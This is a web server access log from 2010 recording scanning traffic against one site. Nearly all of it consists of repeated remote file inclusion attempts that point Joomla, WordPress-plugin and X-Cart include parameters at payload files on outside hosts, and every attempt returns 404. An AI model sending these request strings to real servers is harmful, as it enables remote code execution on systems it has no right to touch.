216.119.103.16 - - [18/Feb/2010:05:18:59 -0800] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [18/Feb/2010:05:19:08 -0800] "GET /logs/access_100120.log///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.180.117.132 - - [18/Feb/2010:05:19:08 -0800] "GET /ashnews.php?pathtoashnews=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.180.117.132 - - [18/Feb/2010:05:19:11 -0800] "GET /logs//ashnews.php?pathtoashnews=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.180.117.132 - - [18/Feb/2010:05:19:14 -0800] "GET /logs/access_100111.log%20%20//ashnews.php?pathtoashnews=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.180.117.132 - - [18/Feb/2010:05:19:36 -0800] "GET /logs/access_100114.log%20%20//ashnews.php?pathtoashnews=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:05:19:46 -0800] "GET /logs/access_100115.log%20%20/htmltonuke.php?filnavn=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:05:19:46 -0800] "GET /logs/access_100103.log%20%20/htmltonuke.php?filnavn=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:05:19:46 -0800] "GET /logs/htmltonuke.php?filnavn=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:05:19:46 -0800] "GET /htmltonuke.php?filnavn=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.180.117.132 - - [18/Feb/2010:05:20:04 -0800] "GET /logs/access_100114.log%20%20//ashnews.php?pathtoashnews=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:05:20:05 -0800] "GET /htmltonuke.php?filnavn=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:05:20:05 -0800] "GET /logs/access_100115.log%20%20/htmltonuke.php?filnavn=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:05:20:05 -0800] "GET /logs/htmltonuke.php?filnavn=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:05:20:05 -0800] "GET /logs/access_100103.log%20%20/htmltonuke.php?filnavn=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.77.131.46 - - [18/Feb/2010:05:20:37 -0800] "GET /logs/access_100114.log/modules/My_eGallery/index.php?basepath=http://www.sinhvienqb.com/news/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [18/Feb/2010:05:22:21 -0800] "GET /admin/auth.php?xcart_dir=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [18/Feb/2010:05:22:21 -0800] "GET /logs/access_100118.log%20%20//admin/auth.php?xcart_dir=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [18/Feb/2010:05:22:21 -0800] "GET /logs//admin/auth.php?xcart_dir=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [18/Feb/2010:05:22:32 -0800] "GET /admin/auth.php?xcart_dir=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [18/Feb/2010:05:22:32 -0800] "GET /logs//admin/auth.php?xcart_dir=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [18/Feb/2010:05:22:32 -0800] "GET /logs/access_100118.log%20%20//admin/auth.php?xcart_dir=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [18/Feb/2010:05:22:33 -0800] "GET /logs/access_100117.log%20%20//admin/auth.php?xcart_dir=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [18/Feb/2010:05:22:41 -0800] "GET /logs/access_100117.log%20%20//admin/auth.php?xcart_dir=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:05:22:47 -0800] "GET /logs/access_100205.log%20%20//include/write.php?dir=http://dev.w-rn.com/a.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.77.131.46 - - [18/Feb/2010:05:23:05 -0800] "GET /logs/access_100105.log/modules/My_eGallery/index.php?basepath=http://www.sinhvienqb.com/news/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.40.122.117 - - [18/Feb/2010:05:23:23 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.universal-fabrications.co.uk/id1.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.40.122.117 - - [18/Feb/2010:05:23:23 -0800] "GET /logs/access_100129.log//bbs/write_update.php?board_skin_path=http://www.universal-fabrications.co.uk/id1.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.40.122.117 - - [18/Feb/2010:05:23:23 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://www.universal-fabrications.co.uk/id1.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.40.122.117 - - [18/Feb/2010:05:23:26 -0800] "GET /logs/access_100202.log//bbs/write_update.php?board_skin_path=http://www.universal-fabrications.co.uk/id1.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:05:23:28 -0800] "GET /logs/access_100115.log/htmltonuke.php?filnavn=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:05:23:30 -0800] "GET /logs/access_100125.log/htmltonuke.php?filnavn=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:05:23:42 -0800] "GET /logs/access_100115.log/htmltonuke.php?filnavn=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.222.56.28 - - [18/Feb/2010:05:24:03 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.anabolex.com/gallery/uploads/8243/id/a?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.222.56.28 - - [18/Feb/2010:05:24:03 -0800] "GET /logs/access_100119.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.anabolex.com/gallery/uploads/8243/id/a?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.222.56.28 - - [18/Feb/2010:05:24:03 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.anabolex.com/gallery/uploads/8243/id/a?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [18/Feb/2010:05:28:02 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.beautycnc.com/bbs/bbs/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [18/Feb/2010:05:28:02 -0800] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.beautycnc.com/bbs/bbs/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [18/Feb/2010:05:28:02 -0800] "GET /logs/access_100105.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.beautycnc.com/bbs/bbs/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [18/Feb/2010:05:28:06 -0800] "GET /logs/access_100118.log//admin/auth.php?xcart_dir=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [18/Feb/2010:05:28:07 -0800] "GET /logs/access_100207.log//admin/auth.php?xcart_dir=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [18/Feb/2010:05:28:13 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [18/Feb/2010:05:28:13 -0800] "GET /logs/access_100127.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [18/Feb/2010:05:28:13 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [18/Feb/2010:05:28:14 -0800] "GET /logs/access_100118.log//admin/auth.php?xcart_dir=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [18/Feb/2010:05:28:14 -0800] "GET /logs/access_100105.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.beautycnc.com/bbs/bbs/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [18/Feb/2010:05:28:18 -0800] "GET /logs/access_100207.log//admin/auth.php?xcart_dir=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [18/Feb/2010:05:28:24 -0800] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.beautycnc.com/bbs/bbs/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [18/Feb/2010:05:28:24 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.beautycnc.com/bbs/bbs/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [18/Feb/2010:05:28:24 -0800] "GET /logs/access_100105.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.beautycnc.com/bbs/bbs/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [18/Feb/2010:05:28:36 -0800] "GET /logs/access_100105.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.beautycnc.com/bbs/bbs/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [18/Feb/2010:05:28:45 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [18/Feb/2010:05:28:45 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [18/Feb/2010:05:28:53 -0800] "GET /logs/access_100127.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [18/Feb/2010:05:29:00 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [18/Feb/2010:05:29:00 -0800] "GET /logs/access_100127.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [18/Feb/2010:05:29:00 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [18/Feb/2010:05:29:12 -0800] "GET /logs/access_100129.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.222.56.28 - - [18/Feb/2010:05:29:27 -0800] "GET /logs/access_100121.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.anabolex.com/gallery/uploads/8243/id/a?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [18/Feb/2010:05:29:43 -0800] "GET /logs/access_100129.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [18/Feb/2010:05:29:53 -0800] "GET /logs/access_100129.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [18/Feb/2010:05:30:18 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.nsi.or.kr/ws/files/summary/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [18/Feb/2010:05:30:18 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.nsi.or.kr/ws/files/summary/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [18/Feb/2010:05:30:18 -0800] "GET /logs/access_100114.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.nsi.or.kr/ws/files/summary/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [18/Feb/2010:05:30:25 -0800] "GET /logs/access_100117.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.nsi.or.kr/ws/files/summary/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:05:31:33 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:05:31:33 -0800] "GET /logs/access_100114.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:05:31:33 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:05:31:52 -0800] "GET /logs/access_100114.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.nsi.or.kr/ws/files/summary/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:05:31:52 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.nsi.or.kr/ws/files/summary/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
38.101.148.126 - - [18/Feb/2010:05:31:54 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "www.puaga.com"
38.101.148.126 - - [18/Feb/2010:05:31:54 -0800] "GET /ideal/forum/viewtopic.php?p=27885 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:05:31:57 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.nsi.or.kr/ws/files/summary/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:05:32:05 -0800] "GET /logs/access_100117.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.nsi.or.kr/ws/files/summary/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:05:32:18 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:05:32:18 -0800] "GET /logs/access_100114.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:05:32:18 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.188.133.214 - - [18/Feb/2010:05:32:29 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sinhvienqb.com/news/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.188.133.214 - - [18/Feb/2010:05:32:29 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sinhvienqb.com/news/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.188.133.214 - - [18/Feb/2010:05:32:29 -0800] "GET /logs/access_100208.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sinhvienqb.com/news/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:05:33:00 -0800] "GET /logs/access_100117.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:05:33:22 -0800] "GET /logs/bbs/delete_all.php?board_skin_path=http://partner.waawaa.com//renewal/images/int_11.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:05:33:22 -0800] "GET /bbs/delete_all.php?board_skin_path=http://partner.waawaa.com//renewal/images/int_11.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:05:33:23 -0800] "GET /logs/access_100121.log%20%20/bbs/delete_all.php?board_skin_path=http://partner.waawaa.com//renewal/images/int_11.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:05:33:30 -0800] "GET /logs/access_100117.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [18/Feb/2010:05:33:49 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.sanvan.net/new/id1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [18/Feb/2010:05:33:49 -0800] "GET /logs/access.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.sanvan.net/new/id1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [18/Feb/2010:05:33:49 -0800] "GET /logs/access_100115.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.sanvan.net/new/id1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [18/Feb/2010:05:33:49 -0800] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.sanvan.net/new/id1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.188.133.214 - - [18/Feb/2010:05:33:57 -0800] "GET /logs/access_100129.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sinhvienqb.com/news/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [18/Feb/2010:05:34:04 -0800] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.sanvan.net/new/id1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [18/Feb/2010:05:34:04 -0800] "GET /logs/access.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.sanvan.net/new/id1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [18/Feb/2010:05:34:04 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.sanvan.net/new/id1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [18/Feb/2010:05:34:04 -0800] "GET /logs/access_100115.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.sanvan.net/new/id1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [18/Feb/2010:05:34:07 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.sanvan.net/new/id1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [18/Feb/2010:05:34:07 -0800] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.sanvan.net/new/id1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [18/Feb/2010:05:34:07 -0800] "GET /logs/access.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.sanvan.net/new/id1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [18/Feb/2010:05:34:07 -0800] "GET /logs/access_100115.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.sanvan.net/new/id1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.43.7 - - [18/Feb/2010:05:34:52 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sinhvienqb.com/news/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.43.7 - - [18/Feb/2010:05:34:52 -0800] "GET /logs/access_100117.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sinhvienqb.com/news/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.43.7 - - [18/Feb/2010:05:34:52 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sinhvienqb.com/news/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.43.7 - - [18/Feb/2010:05:34:52 -0800] "GET /logs/access_100208.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sinhvienqb.com/news/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [18/Feb/2010:05:35:58 -0800] "GET /logs/access_100206.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [18/Feb/2010:05:37:19 -0800] "GET /logs/access_100206.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [18/Feb/2010:05:37:23 -0800] "GET /logs/access_100206.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [18/Feb/2010:05:37:44 -0800] "GET /logs/access_100104.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:05:38:01 -0800] "GET /logs/access_100121.log/bbs/delete_all.php?board_skin_path=http://partner.waawaa.com//renewal/images/int_11.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:05:38:48 -0800] "GET /logs/access_100122.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [18/Feb/2010:05:39:04 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://ufaeda.ru//poll/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
